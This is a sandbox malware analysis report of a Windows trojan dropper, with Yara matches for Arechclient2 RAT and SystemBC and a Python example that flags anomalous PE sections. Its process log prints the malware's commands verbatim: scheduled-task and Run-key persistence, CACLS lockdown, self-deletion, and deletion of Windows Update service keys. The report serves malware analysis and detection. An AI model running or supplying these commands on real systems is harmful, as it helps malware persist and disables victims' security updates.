Source: nppshell[1].exe.0.dr Static PE information: section name: @]topACL
Source: gntuud.exe.4.dr Static PE information: section name: lB@dO\ih
Source: gntuud.exe.4.dr Static PE information: section name: Fh?jG[OJ
Source: gntuud.exe.4.dr Static PE information: section name: qNR5:WbS
Source: gntuud.exe.4.dr Static PE information: section name: z?fd8ijJ
Source: gntuud.exe.4.dr Static PE information: section name: CV?7x>JO
Source: gntuud.exe.4.dr Static PE information: section name: dT<:EHzj
Source: gntuud.exe.4.dr Static PE information: section name: @]topACL
Source: syncfiles[1].dll.13.dr Static PE information: section name: *;>%1sXO
Source: syncfiles[1].dll.13.dr Static PE information: section name: 7rP!Ni:j
Source: syncfiles[1].dll.13.dr Static PE information: section name: bkE<E2?8
Source: syncfiles[1].dll.13.dr Static PE information: section name: 8*7`Joyq
Source: syncfiles[1].dll.13.dr Static PE information: section name: 0Ys'"rSd
Source: syncfiles[1].dll.13.dr Static PE information: section name: $u!6XeN&
Source: syncfiles[1].dll.13.dr Static PE information: section name: K)'tLNvc
Source: syncfiles.dll.13.dr Static PE information: section name: *;>%1sXO
Source: syncfiles.dll.13.dr Static PE information: section name: 7rP!Ni:j
Source: syncfiles.dll.13.dr Static PE information: section name: bkE<E2?8
Source: syncfiles.dll.13.dr Static PE information: section name: 8*7`Joyq
Source: syncfiles.dll.13.dr Static PE information: section name: 0Ys'"rSd
Source: syncfiles.dll.13.dr Static PE information: section name: $u!6XeN&
Source: syncfiles.dll.13.dr Static PE information: section name: K)'tLNvc
Source: cred64[1].dll.13.dr Static PE information: section name: f5g\gWe7
Source: cred64[1].dll.13.dr Static PE information: section name: zDthL)*@
Source: cred64[1].dll.13.dr Static PE information: section name: nb"h!m#Y
Source: cred64[1].dll.13.dr Static PE information: section name: $^+<%+dU
Source: cred64[1].dll.13.dr Static PE information: section name: Z-),j99t
Source: cred64[1].dll.13.dr Static PE information: section name: 8"ikKHD[
Source: cred64[1].dll.13.dr Static PE information: section name: k&l<0?<6
Source: cred64[1].dll.13.dr Static PE information: section name: n[uZh3ex
Source: cred64[1].dll.13.dr Static PE information: section name: Uh%r6i!H
Source: cred64.dll.13.dr Static PE information: section name: f5g\gWe7
Source: cred64.dll.13.dr Static PE information: section name: zDthL)*@
Source: cred64.dll.13.dr Static PE information: section name: nb"h!m#Y
Source: cred64.dll.13.dr Static PE information: section name: $^+<%+dU
Source: cred64.dll.13.dr Static PE information: section name: Z-),j99t
Source: cred64.dll.13.dr Static PE information: section name: 8"ikKHD[
Source: cred64.dll.13.dr Static PE information: section name: k&l<0?<6
Source: cred64.dll.13.dr Static PE information: section name: n[uZh3ex
Source: cred64.dll.13.dr Static PE information: section name: Uh%r6i!H
Source: Emit64[1].exe.13.dr Static PE information: section name: 87*qGv;7
Source: Emit64[1].exe.13.dr Static PE information: section name: ^NsFAbb[
Source: Emit64[1].exe.13.dr Static PE information: section name: 4.ps1S["
Source: Emit64[1].exe.13.dr Static PE information: section name: l^D/X#s1
Source: Emit64[1].exe.13.dr Static PE information: section name: aAyXB94]
Source: Emit64[1].exe.13.dr Static PE information: section name: 7u=]29J1
Source: Emit64[1].exe.13.dr Static PE information: section name: *<5LK<h`
Source: Emit64[1].exe.13.dr Static PE information: section name: Ug$Va';z
Source: Emit64[1].exe.13.dr Static PE information: section name: dA:<*dF(
Source: Emit64[1].exe.13.dr Static PE information: section name: r,Ht]nHV
Source: Emit64[1].exe.13.dr Static PE information: section name: m$m2M1,9
Source: Emit64[1].exe.13.dr Static PE information: section name: o?%]P5Wl
Source: Emit64[1].exe.13.dr Static PE information: section name: lNMkoK?T
Source: Emit64.exe.13.dr Static PE information: section name: 87*qGv;7
Source: Emit64.exe.13.dr Static PE information: section name: ^NsFAbb[
Source: Emit64.exe.13.dr Static PE information: section name: 4.ps1S["
Source: Emit64.exe.13.dr Static PE information: section name: l^D/X#s1
Source: Emit64.exe.13.dr Static PE information: section name: aAyXB94]
Source: Emit64.exe.13.dr Static PE information: section name: 7u=]29J1
Source: Emit64.exe.13.dr Static PE information: section name: *<5LK<h`
Source: Emit64.exe.13.dr Static PE information: section name: Ug$Va';z
Source: Emit64.exe.13.dr Static PE information: section name: dA:<*dF(
Source: Emit64.exe.13.dr Static PE information: section name: r,Ht]nHV
Source: Emit64.exe.13.dr Static PE information: section name: m$m2M1,9
Source: Emit64.exe.13.dr Static PE information: section name: o?%]P5Wl
Source: Emit64.exe.13.dr Static PE information: section name: lNMkoK?T
Source: RtkAudUService64.exe.26.dr Static PE information: section name: 87*qGv;7
Source: RtkAudUService64.exe.26.dr Static PE information: section name: ^NsFAbb[
Source: RtkAudUService64.exe.26.dr Static PE information: section name: 4.ps1S["
Source: RtkAudUService64.exe.26.dr Static PE information: section name: l^D/X#s1
Source: RtkAudUService64.exe.26.dr Static PE information: section name: aAyXB94]
Source: RtkAudUService64.exe.26.dr Static PE information: section name: 7u=]29J1
Source: RtkAudUService64.exe.26.dr Static PE information: section name: *<5LK<h`
Source: RtkAudUService64.exe.26.dr Static PE information: section name: Ug$Va';z
Source: RtkAudUService64.exe.26.dr Static PE information: section name: dA:<*dF(
Source: RtkAudUService64.exe.26.dr Static PE information: section name: r,Ht]nHV
Source: RtkAudUService64.exe.26.dr Static PE information: section name: m$m2M1,9
Source: RtkAudUService64.exe.26.dr Static PE information: section name: o?%]P5Wl
Source: RtkAudUService64.exe.26.dr Static PE information: section name: lNMkoK?T
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61EAD2AC 0_2_61EAD2AC
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E4B8A1 0_2_61E4B8A1
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E8D0B6 0_2_61E8D0B6
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E15337 0_2_61E15337
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E5023C 0_2_61E5023C
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E19208 0_2_61E19208
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E534E3 0_2_61E534E3
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E18736 0_2_61E18736
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E10856 0_2_61E10856
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E21816 0_2_61E21816
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E55BD7 0_2_61E55BD7
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E95D7A 0_2_61E95D7A
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E25FA2 0_2_61E25FA2
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E52F80 0_2_61E52F80
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E4CEF9 0_2_61E4CEF9
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E1EEFF 0_2_61E1EEFF
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E1DEC2 0_2_61E1DEC2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: RtkAudUService64.exe.26.dr Static PE information: Number of sections : 14 > 10
Source: Emit64[1].exe.13.dr Static PE information: Number of sections : 14 > 10
Source: avicapn32[1].exe.13.dr Static PE information: Number of sections : 11 > 10
Source: avicapn32.exe.13.dr Static PE information: Number of sections : 11 > 10
Source: Emit64.exe.13.dr Static PE information: Number of sections : 14 > 10
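The section-name and section-count findings above come from a plain walk of the PE headers and are easy to reproduce offline. The following Python is an added example written for this page, not Joe Sandbox's own check: it parses the COFF header and section table with the standard library only, and the image it inspects is constructed in memory from the Emit64.exe section names listed above (a leading .text section is assumed to bring the count to the reported 14). The conventional-name pattern and the 10-section threshold are the example's own choices, mirroring what the report flags.

```python
"""Static check for two traits this report flags on the dropped PEs: section
names built from non-standard characters and more than 10 sections.
Added example for this page, not Joe Sandbox's detection code. Standard
library only; the PE image parsed below is constructed here, not a real file."""
import re
import struct

# Conventional section names are short ASCII tokens such as .text, .rdata, .rsrc.
CONVENTIONAL = re.compile(rb"^\.?[A-Za-z0-9_]{1,8}$")
MAX_SECTIONS = 10  # threshold the report uses ("Number of sections : 14 > 10")


def section_names(pe: bytes) -> list[bytes]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER (20 bytes): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + opt_size
    names = []
    for i in range(num_sections):
        off = table + i * 40  # IMAGE_SECTION_HEADER is 40 bytes; Name is its first 8
        names.append(pe[off:off + 8].rstrip(b"\0"))
    return names


def suspicious_sections(pe: bytes) -> dict:
    """Report the section count, whether it exceeds the threshold, and odd names."""
    names = section_names(pe)
    odd = [n.decode("latin-1") for n in names if not CONVENTIONAL.match(n)]
    return {"count": len(names), "too_many": len(names) > MAX_SECTIONS, "odd_names": odd}


def build_pe(names: list[bytes]) -> bytes:
    """Construct a minimal, non-runnable PE32 header set with the given section names."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    optional = b"\0" * 0xE0  # size of IMAGE_OPTIONAL_HEADER32
    coff = struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, len(optional), 0x0102)
    image = dos + b"PE\0\0" + coff + optional
    for name in names:
        image += name.ljust(8, b"\0") + b"\0" * 32  # remaining header fields zeroed
    return image


# Section names reported for Emit64.exe; the leading .text is an assumption to make 14.
EMIT64_SECTIONS = [b".text", b"87*qGv;7", b"^NsFAbb[", b'4.ps1S["', b"l^D/X#s1",
                   b"aAyXB94]", b"7u=]29J1", b"*<5LK<h`", b"Ug$Va';z", b"dA:<*dF(",
                   b"r,Ht]nHV", b"m$m2M1,9", b"o?%]P5Wl", b"lNMkoK?T"]
BENIGN_SECTIONS = [b".text", b".rdata", b".data", b".rsrc", b".reloc"]

if __name__ == "__main__":
    print(suspicious_sections(build_pe(EMIT64_SECTIONS)))
    print(suspicious_sections(build_pe(BENIGN_SECTIONS)))
```

Pointing section_names() at a real dropped file (open(path, "rb").read()) gives the same two signals the report lists; note that an odd section name is a packer hint, not proof of malice, which is why the report pairs it with the Yara and behavioural hits.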
Source: Joe Sandbox View Dropped File: C:\ProgramData\61312899942613011832.exe 682ABD62B6E3C0E8CA57F079CD96F2D3848752EAF7002BDF57BFB512BD242811
Source: DQxttu2Qrr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: EXT_MAL_SystemBC_Mar22_1 date = 2022-03-11, hash1 = c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5, author = Thomas Barabosch, Deutsche Telekom Security, description = Detects unpacked SystemBC module as used by Emotet in March 2022, score = https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc, reference2 = https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6, reference = https://twitter.com/Cryptolaemus1/status/1502069552246575105
Source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0000002C.00000002.809371970.0000000010005000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: EXT_MAL_SystemBC_Mar22_1 date = 2022-03-11, hash1 = c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5, author = Thomas Barabosch, Deutsche Telekom Security, description = Detects unpacked SystemBC module as used by Emotet in March 2022, score = https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc, reference2 = https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6, reference = https://twitter.com/Cryptolaemus1/status/1502069552246575105
Source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: Process Memory Space: rundll32.exe PID: 2820, type: MEMORYSTR Matched rule: EXT_MAL_SystemBC_Mar22_1 date = 2022-03-11, hash1 = c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5, author = Thomas Barabosch, Deutsche Telekom Security, description = Detects unpacked SystemBC module as used by Emotet in March 2022, score = https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc, reference2 = https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6, reference = https://twitter.com/Cryptolaemus1/status/1502069552246575105
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED Matched rule: SUSP_Two_Byte_XOR_PE_And_MZ author = Wesley Shields <wxs@atarininja.org>, description = Look for 2 byte xor of a PE starting at offset 0, score = 2021-10-11, reference = https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED Matched rule: SUSP_Four_Byte_XOR_PE_And_MZ author = Wesley Shields <wxs@atarininja.org>, description = Look for 4 byte xor of a PE starting at offset 0, score = 2021-10-11, reference = https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: jekppnay.tmp.26.dr Static PE information: Resource name: EXE type: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Source: DQxttu2Qrr.exe, 00000000.00000000.249003658.0000000001BD0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNamedPipeClientLib.dllF vs DQxttu2Qrr.exe
Source: DQxttu2Qrr.exe Binary or memory string: OriginalFilenameNamedPipeClientLib.dllF vs DQxttu2Qrr.exe
Source: DQxttu2Qrr.exe Static PE information: invalid certificate
Source: umciavi64[1].exe.13.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: umciavi64.exe.13.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: avicapn32[1].exe.13.dr Static PE information: Section: .idata ZLIB complexity 1.0029296875
Source: avicapn32[1].exe.13.dr Static PE information: Section: .n3DK0 ZLIB complexity 0.9937564036885246
Source: avicapn32.exe.13.dr Static PE information: Section: .idata ZLIB complexity 1.0029296875
Source: avicapn32.exe.13.dr Static PE information: Section: .n3DK0 ZLIB complexity 0.9937564036885246
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4
Source: classification engine Classification label: mal100.phis.troj.adwa.spyw.evad.winEXE@83/38@0/9
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: DQxttu2Qrr.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\DQxttu2Qrr.exe C:\Users\user\Desktop\DQxttu2Qrr.exe
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Process created: C:\ProgramData\61312899942613011832.exe "C:\ProgramData\61312899942613011832.exe"
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\ProgramData\61312899942613011832.exe Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe"
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe"
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Users\user\1000018002\avicapn32.exe "C:\Users\user\1000018002\avicapn32.exe"
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qgoyddbo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'RtkAudUService64.exe' /tr '''C:\Users\user\Locktime\RtkAudUService64.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Locktime\RtkAudUService64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'RtkAudUService64.exe' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" /t REG_SZ /f /d 'C:\Users\user\Locktime\RtkAudUService64.exe' }
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe"
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Process created: C:\ProgramData\61312899942613011832.exe "C:\ProgramData\61312899942613011832.exe"
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit
Source: C:\ProgramData\61312899942613011832.exe Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe"
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Users\user\1000018002\avicapn32.exe "C:\Users\user\1000018002\avicapn32.exe"
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe"
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E
